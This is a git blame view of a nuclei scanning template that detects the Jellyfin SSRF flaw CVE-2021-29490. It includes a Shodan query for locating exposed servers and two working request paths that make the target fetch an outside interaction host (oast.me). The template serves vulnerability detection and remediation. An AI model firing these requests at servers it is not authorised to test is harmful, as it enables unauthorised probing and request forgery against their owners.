nuclei-templates/http/cves/2021/CVE-2021-29490.yaml

41 lines
1.4 KiB
YAML
Raw Normal View History

2021-11-24 15:01:45 +00:00
id: CVE-2021-29490
info:
2023-03-09 14:48:32 +00:00
name: Jellyfin 10.7.2 - Server Side Request Forgery
2021-11-24 15:01:45 +00:00
author: alph4byt3
severity: medium
2022-10-19 10:54:26 +00:00
description: |
Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.
2023-09-06 12:09:01 +00:00
remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote".
2021-11-24 15:01:45 +00:00
reference:
- https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96
2022-10-19 10:54:26 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-29490
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cve-id: CVE-2021-29490
cwe-id: CWE-918
epss-score: 0.00137
2023-08-31 11:46:18 +00:00
epss-percentile: 0.48378
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*
2022-10-19 10:54:26 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:09:01 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: jellyfin
product: jellyfin
2023-09-06 12:09:01 +00:00
shodan-query: http.title:"Jellyfin"
2022-10-19 10:54:26 +00:00
tags: cve,cve2021,ssrf,jellyfin,oast
2021-11-24 15:01:45 +00:00
http:
2021-11-24 15:01:45 +00:00
- method: GET
path:
2023-03-09 14:48:32 +00:00
- "{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/"
- "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB"
2021-11-24 15:01:45 +00:00
2022-10-19 10:54:26 +00:00
stop-at-first-match: true
2021-11-24 15:01:45 +00:00
matchers:
- type: word
2022-10-19 10:54:26 +00:00
part: body
2021-11-24 15:01:45 +00:00
words:
2022-10-19 10:54:26 +00:00
- "<h1> Interactsh Server </h1>"